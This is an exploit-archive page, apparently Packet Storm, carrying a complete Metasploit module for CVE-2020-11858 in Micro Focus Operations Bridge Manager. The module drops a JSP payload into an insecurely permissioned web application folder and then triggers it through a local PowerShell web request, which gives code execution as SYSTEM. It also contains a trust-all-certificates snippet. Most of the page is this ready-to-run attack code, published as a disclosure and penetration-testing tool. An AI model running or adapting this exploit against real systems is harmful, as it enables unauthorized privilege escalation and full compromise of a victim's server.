exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Micro Focus Operations Bridge Manager Local Privilege Escalation

Micro Focus Operations Bridge Manager Local Privilege Escalation
Posted Feb 15, 2021
Authored by Pedro Ribeiro | Site metasploit.com

This Metasploit module exploits an insecure permission vulnerability on a folder in Micro Focus Operations Bridge Manager. An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and then access it without authentication by making a request to the OBM server. This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05, but it should work out of the box on earlier versions too.

tags | exploit, code execution
advisories | CVE-2020-11858
SHA-256 | 9f7b81606219444bc6266e1abaa5acdb608ceef1654125907f4811cfd79d69d4

Micro Focus Operations Bridge Manager Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Windows::Powershell
include Msf::Exploit::EXE

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Micro Focus Operations Bridge Manager Local Privilege Escalation',
'Description' => %q{
This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge
Manager.
An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and
then access it without authentication by making a request to the OBM server.
This will result in automatic code execution as SYSTEM. This module has been tested on
OBM 2020.05, but it should work out of the box on earlier versions too.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
],
'Platform' => 'win',
'Privileged' => true,
'SessionTypes' => ['meterpreter'],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[
'Micro Focus Operations Bridge Manager <= 2020.05',
{
'Path' => 'C:\HPBSM\AppServer\webapps\site.war\LB_Verify.jsp'
}
]
],
'References' =>
[
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
[ 'CVE', '2020-11858'],
[ 'ZDI', '20-1326'],
],
'DisclosureDate' => '2020-10-28',
'DefaultTarget' => 0
)
)

register_options([
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
])
end

def exploit
unless session.type == 'meterpreter'
fail_with(Failure::None, 'Only meterpreter sessions are supported')
end

unless have_powershell?
fail_with(Failure::None, 'No Powershell is installed on the host')
end

# according to /lib/msf/core/post/file.rb this is not binary safe on Windows, but we don't care, it's JSP
payload_jsp = Msf::Util::EXE.to_jsp(generate_payload_exe)
write_file(target['Path'], payload_jsp)

if datastore['SSL']
prefix = 'https://'
# Code below allows us to perform TLS requests to servers with self signed certs
# In Powershell 5.1, we can simply use -SkipCertificateCheck, but in older versions we need this
# Taken from https://stackoverflow.com/questions/11696944/powershell-v3-invoke-webrequest-https-error
ps_cmd = %[
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
$AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
[System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
]
else
prefix = 'http://'
ps_cmd = ''
end

uri = "#{prefix}127.0.0.1:#{datastore['RPORT']}#{datastore['TARGETURI']}topaz/LB_Verify.jsp"
print_status("JSP dropped, calling it @ #{uri}")
ps_cmd += "Invoke-WebRequest -Uri #{uri}"
execute_script(ps_cmd)
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close